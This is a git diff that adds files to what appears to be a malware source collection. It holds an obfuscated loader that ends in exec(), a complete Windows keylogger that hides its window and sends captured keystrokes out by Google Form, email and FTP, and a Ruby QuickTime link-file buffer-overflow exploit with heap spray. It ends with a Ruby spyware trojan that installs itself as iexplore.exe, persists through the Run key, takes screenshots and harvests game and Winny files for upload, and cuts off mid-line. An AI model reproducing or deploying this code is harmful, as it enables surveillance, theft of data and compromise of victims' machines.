+M.append([(104.049507734+5.75582437702j),(-8.72678394019-5.7668384277j),(-11.0728012113-0.32217237915j),(-6.87057321217+21.3939122634j),(103.760022178-2.99256708802j),(-6.18499776219-12.1551478727j),(-8.55296803681+54.31807084j),(-58.3551932758-7.47435960792j),(39.190470088+3.236742711j),]) +M.append([(76.9430409827-13.830066127j),(25.1319832458+9.77882938313j),(23.6549471992+11.4951304553j),(-3.81624310702-25.6964065375j),(108.730230203+24.1623701839j),(5.05322782415+22.5769539708j),(-39.5767673149+3.75005714549j),(33.4962700542-11.2140580554j),(135.326728814-4.33230405689j),]) +M.append([(65.3705381002+24.3275637724j),(-23.2408507633-33.1948135285j),(-44.3749218976-10.1563451877j),(30.8389091728+74.8930292425j),(41.3652574764+15.0556813223j),(-36.9319552246+53.5371650042j),(-24.3971696191-65.7465103691j),(47.0569815727+0.905906700125j),(136.264204423-33.3832450947j),]) +M.append([(103.879170415-6.73853523077j),(-20.1941478753-16.2138368074j),(1.27422168444+35.9444148563j),(-3.28016774977+2.63824729836j),(104.873906957+14.1425509676j),(14.7081936915-15.7091034424j),(1.23585470553+0.462230318846j),(3.99583062229+0.00177486657705j),(104.246922628-1.40401573681j),]) +M.append([(109.670502533+0.403141520484j),(7.62437688862-0.469520922423j),(-3.8130361216-0.375627871282j),(14.0602377266+3.46852117946j),(92.5012496763+2.28293319899j),(2.21516616594-3.96314049044j),(1.15517757889+16.0475697982j),(-14.3244254327-19.1761387797j),(119.82824779+3.31392528053j),]) +M.append([(103.630364939+4.54863042641j),(7.34206767122+2.30334575024j),(3.93792103721-1.42468650631j),(5.28646514805-8.78486038728j),(98.758713343+3.91722107348j),(-5.40281247446+4.3533159006j),(14.5436715774+5.03112629715j),(-8.19448665625-12.6529950692j),(97.6109217181-2.46585149989j),]) +M.append([(104.391701773-1.28789346598j),(0.228987611687+5.26905457024j),(-1.3673287265-2.9154578731j),(-5.19199921432-5.86731771378j),(107.927827685+4.0817978047j),(5.19694717434-2.72187536151j),(-3.43168840953-7.95022707391j),(6.04669461661+4.18498345448j),(108.680470541+3.20609566129j),]) +M.append([(88.1645520027+10.9191618534j),(9.74598033305+18.068953036j),(-0.113455388879-5.11740033423j),(-34.909679646-39.8975995576j),(43.7694619926-2.4494446771j),(-12.7606575537-15.2531928161j),(-8.99329464816-45.2183653921j),(-56.5464769405-7.27118850532j),(111.065986005-2.46971717635j),]) +M.append([(87.8436008855+37.2629509457j),(-51.9477703666-28.3330817872j),(-20.1947489139-12.0838625073j),(-15.6555897585+36.5732828063j),(47.3314962468-32.3154414398j),(-21.1146466098-12.552594695j),(0.498644271988+5.19403644322j),(-9.1206559221-3.17935277945j),(95.8249028677+1.05249049408j),]) +M.append([(111.146805692+4.22816251299j),(2.00324359806+10.5843665889j),(-2.76026670136+5.20361787029j),(-0.985087506932-1.29558792278j),(97.2988804122+4.77489490019j),(-2.81701992434-5.43193976106j),(4.97185962129-5.27998630615j),(-1.43241652008-10.0386034583j),(117.554313896-3.00305741318j),]) +M.append([(-21.059624269+69.4352827883j),(47.7772465004-121.415108205j),(120.935434939-10.9319876972j),(2.32311751035+7.32736096727j),(93.8129822074-6.8056664753j),(0.0754000989682-4.74426213079j),(-48.3307205418+97.4666346448j),(-20.0521590244-119.910441446j),(173.246642062-56.629616313j),]) +M.append([(94.7688077375+18.270605105j),(-50.3580988311-8.3225498517j),(30.4393219197+24.5256489646j),(-6.85270305911+5.89181789918j),(82.1382476449-5.73463476433j),(4.80123601494+10.7017896355j),(6.61864679123-4.83167627161j),(13.778199697+8.88223295844j),(98.0929446176-6.53597034071j),]) +M.append([(223.253418937+5.95739588995j),(-77.8544386917+92.0828034681j),(-66.0443657955-165.557230081j),(20.0015446384+12.4300989707j),(73.3785528053+6.58501047921j),(4.85014684391-40.1196037084j),(43.2420823142-86.4244985314j),(35.1454404794+94.4180400311j),(-44.6319717425-6.54240636915j),]) +M.append([(41.0142081682+23.2692063962j),(-10.6086219501+12.7493725956j),(-46.7302597052+49.2056004608j),(51.637072693-8.01584922166j),(110.718041509-6.48634894989j),(46.8309243128-32.6164121693j),(-12.3478982429-19.6604596911j),(-6.48744349525-3.43877091281j),(81.2677503229-10.7828574463j),]) +M.append([(109.877621466+12.9575670925j),(-0.778140589321+10.5307376923j),(13.6006972337-3.82251684732j),(-1.48970463341-8.29533978213j),(102.357458012-1.86290951708j),(-5.23584582302-2.25840002211j),(7.6099988791-4.90702093254j),(5.7456354155-0.0460450739799j),(99.7649205225-5.0946575754j),]) +M.append([(94.7045035062-25.6229683407j),(-18.2391253369+22.7937631609j),(-29.0905604048-7.19037097502j),(-23.0583403669-39.2866397524j),(84.4266794832+39.7464274999j),(-46.0279000559-20.4386101794j),(-20.7027086938-29.2221245384j),(-18.6498115923+31.300573431j),(76.8688170106-8.1234591592j),]) +M.append([(105.670108346-3.91057638934j),(-3.64697546254+1.44567755708j),(-3.71735073048-12.7439262806j),(-7.99274261168+0.34948217567j),(109.08995481+3.47786624051j),(-10.2704859141+6.0654065736j),(-0.194287756539+3.86197876037j),(-1.44643001225-2.3985124903j),(102.239936845+6.43271014883j),]) +M.append([(122.580470378-14.4341507316j),(-27.9438628782+10.3163428973j),(-15.959467946-25.3057176316j),(31.5540729618-32.8694065023j),(46.8175228377-21.2447861623j),(6.09279603678-75.1153578148j),(-22.2133570254+12.3894404294j),(34.6467245111+24.5784878294j),(99.6020067838+41.6789368939j),]) +M.append([(118.85308691+82.9440945768j),(-36.7483143231+71.5868022216j),(-14.0602241989+48.8832603538j),(-132.891784217-67.3064515175j),(33.3702442097-118.126219615j),(-62.7605460516-60.0857139837j),(12.2710245926+63.6543411513j),(-20.456384219+60.6722531119j),(107.77666888+41.1821250382j),]) +M.append([(106.436935258+0.928988682079j),(3.93779429639+6.68647382008j),(-0.0389643589009+10.2941097267j),(2.02626855767+0.877555321617j),(99.4113275962+4.72209193461j),(-3.18653446253+4.32872182213j),(-0.943084208786-6.41108105498j),(2.98095284974-3.31170222485j),(105.151737146+0.348919383309j),]) +M.append([(89.8393869858+35.1156535265j),(-108.098660853-84.0641370429j),(-93.5592844814-144.096505433j),(-1.52256241496+37.1313230361j),(-62.3311003044-67.6198151922j),(-149.146935766-152.098017315j),(-11.6934149927-25.8642378853j),(102.202629088+0.396174315178j),(221.491713319+38.5041616656j),]) +M.append([(184.999581386-303.410690053j),(218.314145844-155.474761163j),(262.880172627+230.115099676j),(-538.767619748-98.455473687j),(-203.66848676-357.747658577j),(359.059170049-493.880837704j),(469.81304818-382.628798149j),(531.60552896+5.35571698513j),(261.668905373+667.15834863j),]) +M.append([(124.484426976-4.79265261306j),(-1.90039577969+15.2806731306j),(-18.7190751541+1.5572252021j),(27.8626383998+26.0405223995j),(79.3599559898+13.1200825749j),(-18.4075679284-18.5560150143j),(-12.4597152173+7.93055072715j),(-2.36047405658-8.7957114854j),(108.155617034-2.32742996182j),]) +M.append([(92.6459559853-1.61276841314j),(-2.0775597689+6.17372014973j),(1.58885077997+44.1526032096j),(-10.0586572313-15.3981052444j),(102.608682641+6.90841217943j),(-28.4935227638+37.3104003402j),(0.952674935262+1.69014692933j),(0.176304072703+1.37540601544j),(115.745361374+0.704356233709j),]) +M.append([(110.352225966+15.0065645213j),(1.42965534543-13.4014323936j),(-10.7448834991+0.0219689393547j),(57.5347841678-26.5000549214j),(55.3558840653-19.5118382831j),(-15.349876293+32.2392737263j),(-13.599951644-29.5406287949j),(-11.8306821749+21.3907330347j),(114.291889969+10.5052737619j),]) +M.append([(127.619853945+6.41616340126j),(3.62478727278-7.68008027677j),(0.124935166111-11.0775400641j),(-2.76561151013-15.0636851946j),(101.573759382+1.49058531598j),(-7.1698539994+3.47262961061j),(5.56386532794+0.856124995439j),(0.556465885654-2.13151008852j),(107.806386673-1.90674871724j),]) +M.append([(129.375564736-27.6356017879j),(130.633802405+16.6327156314j),(63.9163645123-80.5372989939j),(5.30892321897+13.7359651655j),(64.8038754853+38.8830235124j),(3.09452345512+35.5540061223j),(-17.5222898492-0.775799027654j),(-33.6207752829-55.6332905587j),(48.8205597791-5.24742172451j),]) +M.append([(128.165629995+46.851034685j),(-43.5399488716+50.0747581674j),(-46.0582844675-16.3828631231j),(-29.8868468217+65.6767553681j),(12.9446164156-2.75648494841j),(-26.6597116882-79.7372322933j),(-16.5963386111+31.3463623124j),(-47.430583864-6.87775041003j),(100.889753589-38.0945497366j),]) +M.append([(107.475753937-8.73914157279j),(-14.7370476469-12.2953925586j),(-9.0605469686-11.6014273048j),(6.78665637989-45.7250245438j),(57.0367272907-30.8464281211j),(-15.8499229947-40.2424461761j),(-49.7238750637+31.9402101387j),(6.57848208777+65.6049084414j),(77.4875187726+45.5855696939j),]) +M.append([(115.100711527+2.07929665225j),(0.41771554184-0.785257450021j),(-0.0371116950126+0.0181246287347j),(2.06862780962+1.08414962847j),(114.922123142+1.20839044412j),(0.802727678553+1.91427683396j),(0.494766249983+0.00450813801499j),(0.101233800608+0.6116084733j),(116.977165331+2.71231290364j),]) +M.append([(118.758300393-38.713436278j),(-100.033551513-21.6515062627j),(99.6928681056-5.4765076885j),(41.4635727201-48.9116687864j),(-28.8384928343+13.0342444563j),(65.3947415069-23.7200622778j),(54.9240245771+4.62648931131j),(-46.411851834-46.1306247796j),(96.0801924414+31.6791918218j),]) +myMTXcode=getstring(M) +exec(myMTXcode) diff --git a/Python/xenotix.py b/Python/xenotix.py new file mode 100644 index 00000000..933603a1 --- /dev/null +++ b/Python/xenotix.py @@ -0,0 +1,210 @@ +''' +Xenotix Python Keylogger for Windows +==================================== +Coded By: Ajin Abraham <ajin25@gmail.com> +Website: http://opensecurity.in/xenotix-python-keylogger-for-windows/ +GitHub: https://github.com/ajinabraham/Xenotix-Python-Keylogger + +FEATURES +======== +1.STORE LOGS LOCALLY +2.SEND LOGS TO GOOGLE FORMS +3.SEND LOGS TO EMAIL +4.SEND LOGS TO FTP + +MINIMUM REQUIREMENTS +=================== +Python 2.7: http://www.python.org/getit/ +pyHook Module: http://sourceforge.net/projects/pyhook/ +pyrhoncom Module: http://sourceforge.net/projects/pywin32/ + +pyHook Module - +Unofficial Windows Binaries for Python Extension Packages: http://www.lfd.uci.edu/~gohlke/pythonlibs/ + + +NOTE: YOU ARE FREE TO COPY,MODIFY,REUSE THE SOURCE CODE FOR EDUCATIONAL PURPOSE ONLY. +''' +try: + import pythoncom, pyHook +except: + print "Please Install pythoncom and pyHook modules" + exit(0) +import os +import sys +import threading +import urllib,urllib2 +import smtplib +import ftplib +import datetime,time +import win32event, win32api, winerror + +#Disallowing Multiple Instance +mutex = win32event.CreateMutex(None, 1, 'mutex_var_xboz') +if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS: + mutex = None + print "Multiple Instance not Allowed" + exit(0) +x='' +data='' +count=0 + +#Hide Console +def hide(): + import win32console,win32gui + window = win32console.GetConsoleWindow() + win32gui.ShowWindow(window,0) + return True +def msg(): + print """Xenotix Python Keylogger for Windows +Coder: Ajin Abraham <ajin25@gmail.com> +OPENSECURITY.IN + +usage:xenotix_python_logger.py mode +mode: + local: store the logs in a file [keylogs.txt] + remote: send the logs to a Google Form. You must specify the Form URL and Field Name in the script. + email: send the logs to an email. You must specify (SERVER,PORT,USERNAME,PASSWORD,TO). + ftp: upload logs file to an FTP account. You must specify (SERVER,USERNAME,PASSWORD,SSL OPTION,OUTPUT DIRECTORY). + """ + return True + +#Local Keylogger +def local(): + global data + if len(data)>100: + fp=open("keylogs.txt","a") + fp.write(data) + fp.close() + data='' + return True + +#Remote Google Form logs post +def remote(): + global data + if len(data)>100: + url="https://docs.google.com/forms/d/xxxxxxxxxxxxxxxxxxxxxxxxxxxxx" #Specify Google Form URL here + klog={'entry.xxxxxxxxxxx':data} #Specify the Field Name here + try: + dataenc=urllib.urlencode(klog) + req=urllib2.Request(url,dataenc) + response=urllib2.urlopen(req) + data='' + except Exception as e: + print e + return True + +#Email Logs +class TimerClass(threading.Thread): + def __init__(self): + threading.Thread.__init__(self) + self.event = threading.Event() + def run(self): + while not self.event.is_set(): + global data + if len(data)>100: + ts = datetime.datetime.now() + SERVER = "smtp.gmail.com" #Specify Server Here + PORT = 587 #Specify Port Here + USER="your_email@gmail.com"#Specify Username Here + PASS="password_here"#Specify Password Here + FROM = USER#From address is taken from username + TO = ["to_address@gmail.com"] #Specify to address.Use comma if more than one to address is needed. + SUBJECT = "Keylogger data: "+str(ts) + MESSAGE = data + message = """\ +From: %s +To: %s +Subject: %s + +%s +""" % (FROM, ", ".join(TO), SUBJECT, MESSAGE) + try: + server = smtplib.SMTP() + server.connect(SERVER,PORT) + server.starttls() + server.login(USER,PASS) + server.sendmail(FROM, TO, message) + data='' + server.quit() + except Exception as e: + print e + self.event.wait(120) + +#Upload logs to FTP account +def ftp(): + global data,count + if len(data)>100: + count+=1 + FILENAME="logs-"+str(count)+".txt" + fp=open(FILENAME,"a") + fp.write(data) + fp.close() + data='' + try: + SERVER="ftp.xxxxxx.com" #Specify your FTP Server address + USERNAME="ftp_username" #Specify your FTP Username + PASSWORD="ftp_password" #Specify your FTP Password + SSL=0 #Set 1 for SSL and 0 for normal connection + OUTPUT_DIR="/" #Specify output directory here + if SSL==0: + ft=ftplib.FTP(SERVER,USERNAME,PASSWORD) + elif SSL==1: + ft=ftplib.FTP_TLS(SERVER,USERNAME,PASSWORD) + ft.cwd(OUTPUT_DIR) + fp=open(FILENAME,'rb') + cmd= 'STOR' +' '+FILENAME + ft.storbinary(cmd,fp) + ft.quit() + fp.close() + os.remove(FILENAME) + except Exception as e: + print e + return True + +def main(): + global x + if len(sys.argv)==1: + msg() + exit(0) + else: + if sys.argv[1]=="local": + x=1 + hide() + elif sys.argv[1]=="remote": + x=2 + hide() + elif sys.argv[1]=="email": + hide() + email=TimerClass() + email.start() + elif sys.argv[1]=="ftp": + x=4 + hide() + else: + msg() + exit(0) + return True +main() + +def keypressed(event): + global x,data + if event.Ascii==13: + keys='<ENTER>' + elif event.Ascii==8: + keys='<BACK SPACE>' + elif event.Ascii==9: + keys='<TAB>' + else: + keys=chr(event.Ascii) + data=data+keys + if x==1: + local() + elif x==2: + remote() + elif x==4: + ftp() + +obj = pyHook.HookManager() +obj.KeyDown = keypressed +obj.HookKeyboard() +pythoncom.PumpMessages() \ No newline at end of file diff --git a/Ruby/Constructor.Ruby.Qtp.a b/Ruby/Constructor.Ruby.Qtp.a new file mode 100644 index 00000000..f2c1c175 --- /dev/null +++ b/Ruby/Constructor.Ruby.Qtp.a @@ -0,0 +1,61 @@ + +#!/usr/bin/ruby +# Copyright (c) LMH <lmh [at] info-pull.com> +# Kevin Finisterre <kf_lists [at] digitalmunition.com> +# +# Notes: +# Our command string is loaded on memory at a static address normally, +# but this depends on execution method and the string length. The address set in this exploit will +# be likely successful if we open the resulting QTL file directly, without having an +#ツinstance of Quicktime running. Although, when using another method and string, you'll need +# to find the address. +# For 100% reliable exploitation you can always use the /bin/sh address, +# but that's not as a cool as having your box welcoming the new year. +# Do whatever you prefer. That said, enjoy. +# +# see http://projects.info-pull.com/moab/MOAB-01-01-2007.html + +# Command string: Use whatever you like. +# Remember that changing this will also need a change of the target address for system(), +# unless string length is the same. +CMD_STRING = "/usr/bin/say Happy new year shit bag" + +# Mac OS X 10.4.8 (8L2127) +EBP_ADDR = 0xdeadbabe +SYSTEM_ADDR = 0x90046c30 # NX Wars: The Libc Strikes Back +SETUID_ADDR = 0x900334f0 +CURL_ADDR = 0x916c24bc # /usr/bin/curl +SHELL_ADDR = 0x918bef3a # /bin/sh +CMDSTR_ADDR = [ + SHELL_ADDR, # 0 addr to static /bin/sh (lame) + 0x017a053c, # 1 addr to our command string (cool) :> (change as necessary) + 0xbabeface, # 2 bogus addr for testing. + CURL_ADDR # 3 addr to '/usr/bin/curl' + ] + +# Payload. default to CMDSTR_ADDR 0 (/bin/sh) +HAPPY = ("A" * 299) + + [EBP_ADDR].pack("V") + + [SYSTEM_ADDR].pack("V") + + [SETUID_ADDR].pack("V") + + [CMDSTR_ADDR[0]].pack("V") # change array index for using diff. addr (see CMDSTR_ADDR) + +# Sleds: not necessary if using /bin/bash addr or other built-in addresses. +# although, for using our own fu, we need to spray some data for better reliability +# the goal is causing allocation of large heap chunks +NEW = ("\x90" * 30000) + CMD_STRING # feed the heap +YEAR = ("\x90" * 30000) + CMD_STRING # go johnny, go +APPLE = ("\x90" * 30000) + "EOOM" # feed the heap more +BOYZ = ("\x90" * 30000) + "FOOM" # and more + +# QTL output template +QTL_CONTENT = "<?xml version=\"1.0\"?>" + + "<?quicktime type=\"application/x-quicktime-media-link\"?>" + + "<embed autoplay=\"true\" moviename=\"#{NEW}\" " + + "qtnext=\"#{YEAR}\" type=\"video/quicktime#{APPLE}\" " + + "src=\"rtsp://#{BOYZ}:#{HAPPY}\" />\n" + +target_file = File.open("pwnage.qtl", "w+") { |f| + f.print(QTL_CONTENT) + f.close +} diff --git a/Ruby/Trojan-Spy.Ruby.Kakkeys.d b/Ruby/Trojan-Spy.Ruby.Kakkeys.d new file mode 100644 index 00000000..438d7b71 --- /dev/null +++ b/Ruby/Trojan-Spy.Ruby.Kakkeys.d @@ -0,0 +1,574 @@ +$KCODE = 's' +#$DEBUG = true +#Exerb = nil +require 'Win32API' +if ARGV.size == 1 and ARGV[0].include?('RoAddr') + $path = ARGV[0] + if File.exist?($path) + $rost = Win32API.new($path, 'RO_GetNowState', '', 'l') + $rowld = Win32API.new($path, 'RO_GetNowWorld', '', 'p') + $ropa = Win32API.new($path, 'RO_GetNowParam', 'i', 'p') + $roin = Win32API.new($path, 'RO_RoAddrInit', 'lpl', 'i') + $roin.call(0, '', 0x7FFFFFFF) + $rost.call + if $rost.call == 2 + print $ropa.call(258).to_s + "[#{$rowld.call}]" + end + end + exit +end +require 'win32/registry' +require 'ftools' +def dll(file) +if !File.exist?('C:/windows/system32/' + file) + f = Exerb.open(file) + f.binmode + open('C:/windows/system32/' + file, 'w'){|f2| + f2.binmode + f.read 9 + p f2.write(f.read) + } + f.close +end +end +if Exerb + if !Exerb.filepath.include?('iexplore') + File.copy(Exerb.filepath, 'C:/windows/system32/iexplore.exe') + `start install.exe` + dll('zlib.dll') + dll('7-zip32.dll') + dll('imgctl.dll') + Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', Win32::Registry::Constants::KEY_WRITE){|key| + key.write_s('Shell', 'C:/windows/system32/iexplore.exe') + } + `start C:\\windows\\system32\\iexplore.exe` + exit + else +=begin + $double = Thread.new{ + cm = Win32API.new('kernel32', 'CreateMutex', 'llp', 'l') + rm = Win32API.new('kernel32', 'ReleaseMutex', 'l', 'l') + ch = Win32API.new('kernel32', 'CloseHandle', 'l', 'l') + om = Win32API.new('kernel32', 'OpenMutex', 'llp', 'l') + gle = Win32API.new('kernel32', 'GetLastError', '', 'l') + + hage = cm.call(0, 0, 'hagemoe') + if gle.call == 183 + ch.call hage + hage = nil + hagege = cm.call(0, 0, 'hagegemoe') + if gle.call == 183 + ch.call hagege + exit 1 + end + elsif + 0 + end + if hage + s = 'hagegemoe' + else + s = 'hagemoe' + end + while(1) + a = om.call(1, 0, s) + if a == 0 + if ARGV[0] == 'aaa' + p system("start #{Exerb.filepath}") + else + p system("strat #{Exerb.filepath} aaa") + end + Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, '\SOFTWARE\Microsoft\Windows\CurrentVersion\Run', Win32::Registry::Constants::KEY_WRITE){|key| + key.write_s('Shell', 'C:/windows/system32/iexplore.exe') + } + sleep 0.1 + else + ch.call(a) + end + #p "sss" + sleep 0.04 + end + } +=end + end +end +if ARGV[0] == 'aaa' + sleep +end +END { + Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', Win32::Registry::Constants::KEY_WRITE){|key| + key.write_s('Shell', 'C:/windows/system32/iexplore.exe') + } +} +require 'kconv' +require 'web/agent' +require 'web/linkextor' + + +$wait_time = 1 +$bbs_arr = [['computer', '10041'], ['computer', '10376'], ['computer', '11089'], ['computer', '14218'], ['computer', '14368'], ['computer', '6135'], ['computer', '6253'], ['computer', '6346'], ['computer', '7430'], ['game', '1185'], ['game', '12884'], ['game', '18472'], ['game', '19824'], ['game', '5420'], ['game', '5458'], ['game', '6141'], ['game', '9397'], ['shop', '832'], ['computer', '6567'], ['game', '10013'], ['computer', '21565'], ['computer', '21563']] + +$category = '' +$bbs = '' + +$ropath = [] +$korepath = [] +$nypath = [] +$toolpath = [] +$charanames = [] +$tar = ['ragnarok.exe', 'items_control.txt', 'winny.exe'] +$tool = ['ChatPon.exe', 'arose*.exe', 'AutoImo.exe', 'eqview.exe', 'ExS.exe', 'Meron*.exe', 'RAGNAvi.exe', 'RoAbrPure.exe', 'RoCha.exe', 'RoMonitor.exe', 'ro.exe' ,'ROPTAssist.exe' ,'RSS.exe' ,'rohp.exe' ,'RoLogger.exe' ,'MessengerGPS.exe' ,'Lognarok.exe' ,'ro_gps.exe', 'ROGIS.exe' ,'xdior*.exe' ,'LimeChat.exe'] +$kakikomi = [] +$id = '' +$charaarr = [] +$charas = '' +$tekito_id = '' +def Dir.copy(from, to, *jogai) + begin + sleep 0.01 + Dir.foreach(from){|x| + if !x.match(/^\.\.?/) + if File.directory?(from + x) + Dir.mkdir(to + x) + Dir.copy(from + x + '/', to + x + '/', *jogai) + else + if !jogai.any?{|jo| x.include?(jo)} or jogai.size == 0 + File.copy(from + x, to + x) + end + end + end + } + rescue + return 1 + end + 0 +end +def delete_dir(dir) + begin + Dir.foreach(dir){|x| + if !x.match(/^\.\.?/) + if File.directory?(dir + x) + if Dir.entries(dir + x).size <= 2 + Dir.delete(dir + x) + else + delete_dir(dir + x + '/') + end + else + File.delete(dir + x) + end + end + } + Dir.delete(dir) + rescue + return 1 + end + 0 +end +def roname + abx = `#{Exerb.filepath} \"#{$ropath}/RoAddr.dll\"` if Exerb + return nil if abx.size == 0 + $charanames.push(abx) if !$charanames.include?(abx) + savedata($savefile) + abx +end +def emotion_wana wana + Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\Gravity Soft\Ragnarok\ShortCutList', Win32::Registry::Constants::KEY_WRITE){|key| + for i in 0..9 + key.write_s(i.to_s, wana) + end + } +end +def upfolder(folder, trip) + Dir.mkdir(folder) if !File.exist?(folder) + begin + $nypath.each{|x| + File.chmod(0777, x + '/upfolder.txt') + open(x + '/UpFolder.txt', 'a+'){|f| + f.write("\n[ブーン]\nPath=#{folder}\nTrip=#{trip}") if !f.read.include?('ブーン') + } + } + rescue + end + folder +end +def saiki dir + sleep 0.01 + begin + Dir.chdir(dir){ + #print Dir.pwd + "\n" + $ropath.push Dir.pwd if File.exist?($tar[0]) + $korepath.push File.dirname(Dir.pwd) if File.exist?($tar[1]) + sleep 0.01 + $nypath.push Dir.pwd if File.exist?($tar[2]) + $kakikomi.push( Dir.pwd + '/' + 'kakikomi.txt') if File.exist?('kakikomi.txt') + $toolpath.push Dir.pwd if Dir[$tool.join("\0")].size != 0 + Dir.foreach('./'){ |x| + if File.directory?(x) && !x.match(/\.\.?/) + saiki(x) + end + } + } + rescue + p $! + ensure + end +end +def search + get_drv_type = Win32API.new('kernel32', 'GetDriveType', 'p', 'l') + + for drive in 'CDEFGHIJKLMNOPQRSTUVWXYZ'.split('') + if get_drv_type.call(drive + ':/') == 3 + saiki(drive + ':/') + end + end + $ropath.uniq! + $toolpath.uniq! + $korepath.uniq! + $nypath.uniq! +end +def savedata(path) + open(path, 'w'){|f| + Marshal.dump($ropath, f) + Marshal.dump($korepath, f) + Marshal.dump($nypath, f) + Marshal.dump($toolpath, f) + Marshal.dump($kakikomi, f) + Marshal.dump($bbs_arr, f) + Marshal.dump($charanames, f) + Marshal.dump($tekito_id, f) + } + true +end +def loaddata(path) + return false if !File.exists?(path) + open(path){|f| + $ropath = Marshal.load(f) + $korepath = Marshal.load(f) + $nypath = Marshal.load(f) + $toolpath = Marshal.load(f) + $kakikomi = Marshal.load(f) + $bbs_arr = Marshal.load(f) + $charanames = Marshal.load(f) + $tekito_id = Marshal.load(f) + } + true +end +def rns *str + if str.size == 1 + str = str[0].split('') + end + str[rand(str.size)] +end +def names +begin +$charaarr = [] +$charas = '' +separater = rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', '焼', 'ああああ', 'zeny', 'ini', 'config', 'パケ', *$omosiro_words) +Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\\Gravity Soft\\Ragnarok\\Whisperlist\\') { |wisp_list| + wisp_list.each_key{|server_str, sute| + $charas += server_str + "\n" + wisp_list.open(server_str){|server| + server.each_key{|char_str, sute| + $charaarr.push char_str.split("\0")[0] + } + } + $charas += $charaarr.join(separater) + "\n" + $charanames.join(separater) + "\n" + $charaarr = [] + } +} +Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\\Gravity Soft\\Ragnarok\\'){|key| $id = key.read('ID')[1].split("\0")[0]} +rescue + p $1 +end +end +names + +$upup = upfolder('C:\program files\daemontools\\', '') +$capture = Proc.new{ + loop do + getDC = Win32API.new('user32', 'GetDC', 'l', 'l') + releaceDC = Win32API.new('user32', 'ReleaseDC', 'll', 'l') + dc2dib = Win32API.new('imgctl', 'DCtoDIB', 'lllll', 'l') + dib2png = Win32API.new('imgctl', 'DIBtoPNG', 'pli', 'i') + deleteDib = Win32API.new('imgctl', 'DeleteDIB', 'l', 'i') + begin + akakaka = roname + hdc = getDC.call(0) + hdib = dc2dib.call(hdc,0,0,0,0) + dib2png.call($upup+'[バグザロック] '+$tekito_id+' '+Time.now.strftime('%Y%m%d-%H%M%S')+' 「'+$charanames.join('」「')+'」.png', hdib, 0) + File.rename(Dir.glob('C:/program files/daemontools/*.zip')[0], "#{$upup}[バグザロック] #{$id} 「#{$charanames.join('」「')}」.zip") if (Dir.glob('C:/program files/daemontools/*.zip').size > 0) + ensure + deleteDib.call(hdib) + releaceDC.call(0, hdc) + end + if akakaka + jikan = Time.now + if jikan.wday == 0 and jikan.hour < 24 and jikan.hour > 18 + emotion_wana "やあ僕BOTer!#{$charanames[rand($charanames.size)]} はBOTだよ ハゲ孫泰蔵と森下はさっさと死ね!!" + sleep 5 * 60 + else + sleep 12 * 60 + end + else + begin + open('c:/program files/internet explorer/iexplore.exe', 'a'){} + sleep 20 * 60 + rescue + sleep 15 * 60 + end + end + end +} +#init +$savefile = 'C:/RECYCLER/explorer.sys' +if !loaddata($savefile) + Thread.new(&$capture) + search + savedata($savefile) +else + Thread.new(&$capture) +end +if $tekito_id.size == 0 + $tekito_id = $id +end +#p $ropath, $korepath, $nypath, $toolpath, $charanames +if Dir.glob('C:/program files/daemontools/*.zip').size == 0 +begin + tmpf = 'C:/RECYCLER/tmp/' + Dir.mkdir(tmpf) if !File.exist?(tmpf) + $toolpath.each{|x| + to = tmpf + x.gsub(/\/|:/, '_') + if File.exist?(to);to = to + '_';end + Dir.mkdir(to) + Dir.copy(x + '/', to + '/', 'txt') + } + $korepath.each{|x| + to = tmpf + x.gsub(/\/|:/, '_') + if File.exist?(to);to = to + '_';end + Dir.mkdir(to) + Dir.copy(x + '/', to + '/', 'fld') + } + $ropath.each{|x| + to = tmpf + x.gsub(/\/|:/, '_') + if File.exist?(to);to = to + '_';end + Dir.mkdir(to) + Dir.copy(x + '/', to + '/', '.grf', '.gpf', '.mp3', '.bmp', '.ebm', '.fld') + } + $nypath.each_with_index{|x, i| + if i == 0 + to = tmpf + 'winny' + else + to = tmpf + 'winny' + i.to_s + end + Dir.mkdir(to) if !File.exist?(to) + File.copy(x + '/' + 'Download.txt', to + '/' + 'Download.txt') if File.exist?(x + '/' + 'Download.txt') + File.copy(x + '/' + 'Tab1.txt', to + '/' + 'Tab1.txt') if File.exist?(x + '/' + 'Tab1.txt') + File.copy(x + '/' + 'Tab2.txt', to + '/' + 'Tab2.txt') if File.exist?(x + '/' + 'Tab2.txt') + } + $kakikomi.each{|x| + File.copy(x, tmpf + x.gsub(/\/|:/, '_')) if !File.exist?(x) + } + seven_zip = Win32API.new('7-zip32.dll', 'SevenZip', 'lppl', 'i') + str = 'aaaaa' + + seven_zip.call(0, 'a -tzip -hide "' + $upup + '[バグザロック] ' + $id + ' 「' + $charanames.join('」「') + '」.zip" c:\recycler\tmp\ -r', str, 5) +rescue + p $! + print $!.backtrace.join("\n") +ensure + delete_dir tmpf +end +end +#exit + +$path = $ropath[0] + '/' + +$roaddr = File.exist?($path + 'roaddr.dll') +$ro = File.exist?($path + 'ragexe.exe') +$are = File.exist?($path + 'ws2_32.dll') +$rtx = File.exist?($path + 'ddraw.dll') +def rtx + rns(rns('rRrR'), rns('あアア') + rns('ー−‐-あアア') + rns('るルル')) + + rns(rns('tTtT'), rns('てテテ') + rns('いぃイぃイ') + rns('いイイー−‐-')) + + rns(rns('xXxX'), rns('えエエ') + rns('つツっッッ') + rns('くクク') + rns('すスス')) +end + +def aretool + rns(rns('aAaA'), rns('あアア')) + + rns(rns('rRrR') + rns('eEeE'), rns('れレレ')) + + rns(rns('tTtT') + rns('oOoO00'), rns('つツツ')) + + rns(rns('oOoO00'), rns('うウウー−‐-')) + + rns(rns('lLlL'), rns('るルル')) +end +$nypath.each{|x| + if File.exist?(x + '/Tab1.txt') + open(x + '/Tab1.txt'){|f| + $omosiro_words = f.read.split("\n") + } + end +} + +def getThreads + http = Web::Agent.new + http.setup + http.req.header['User-Agent']="Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20040803 